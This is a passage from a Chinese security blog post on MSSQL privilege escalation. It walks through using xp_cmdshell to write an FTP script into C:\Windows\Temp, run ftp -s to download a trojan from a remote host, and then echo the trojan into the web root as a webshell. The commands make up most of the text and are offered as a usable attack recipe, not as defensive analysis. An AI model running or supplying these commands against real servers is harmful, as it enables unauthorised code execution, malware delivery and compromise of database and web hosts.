情况较为特殊,只有目录C:\Windows\Temp\,有上传权限:
Exec master.dbo.xp_cmdshell 'cd C:\Windows\Temp'
Exec master.dbo.xp_cmdshell 'echo open ip地址 >>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo 账户>>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo 密码>>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo bin>>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo get 文件名称>>C:\Windows\Temp\8.txt'
Exec master.dbo.xp_cmdshell 'echo bye>>C:\Windows\Temp\8.txt'这里下载的文件默认下载到c:\user\你当前用户名 目录下方,但是这个目录没可写。即便下载了也没戏,因为根本没存进去。
于是接着执行,(先cd到可执行目录,然后在执行ftp,这样就下载到了指定的目录。)
cd C:\Windows\Temp\&ftp -s:C:\Windows\Temp\8.txt
木马下载到 C:\Windows\Temp\ 目录里面。
然后echo 木马到网站目录的时候格式
"<你的木马><" >>输出的路径+文件名
本文为原创文章,版权归lsh4ck's Blog所有,欢迎分享本文,转载请保留出处!
![Mssql 常规提权 [ 基础利用 ]](https://www.lshack.cn/wp-content/themes/dragon/functions/timthumb.php?src=aHR0cHM6Ly93d3cubHNoYWNrLmNuL3dwLWNvbnRlbnQvdGhlbWVzL2RyYWdvbi9hc3NldHMvaW1hZ2VzL3JhbmRvbS8xMC5qcGc&w=375&h=250&q=70&zc=1)
